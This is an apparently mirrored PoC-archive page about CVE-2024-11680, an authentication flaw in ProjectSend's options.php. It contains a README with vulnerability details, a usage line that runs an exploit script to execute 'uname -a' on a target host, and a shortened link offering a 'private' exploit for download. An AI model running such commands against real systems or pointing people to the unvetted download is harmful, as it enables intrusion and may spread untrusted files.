关联漏洞
标题:
ProjectSend 安全漏洞
(CVE-2024-11680)
描述:ProjectSend(cFTP)是ProjectSend开源的一套基于PHP和MySQL的自托管应用程序。 ProjectSend r1720之前版本存在安全漏洞,该漏洞源于受到身份验证漏洞的影响,远程未经身份验证的攻击者可以通过发送精心设计的HTTP请求实现对应用程序配置的未经授权修改。
描述
CVE-2024-11680: Improper Authentication (CWE-287)
介绍
# CVE-2024-11680: Improper Authentication (CWE-287)
## Overview
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Remote, unauthenticated attackers can exploit this flaw by sending crafted HTTP requests to options.php, enabling unauthorized modification of the application's configuration.
## Details
+ **CVE ID:** CVE-2024-11680
+ **Published:** 2024-11-26
+ **Impact:** Critical
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.8
## Vulnerability Description
Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript. This vulnerability has a high impact on confidentiality, integrity, and availability of the affected system. The attack vector is network-based, requires no user interaction, and can be executed with low attack complexity by an unauthenticated attacker.
## Affected Versions
**ProjectSend versions prior to r1720**
## Usage
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact famixcm@thesecure.biz
## Exploit
**[Download Here](https://bit.ly/49baipg)**
文件快照
[4.0K] /data/pocs/db578f6cce832be28db11768bb18d8b79f22fa4f
└── [1.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。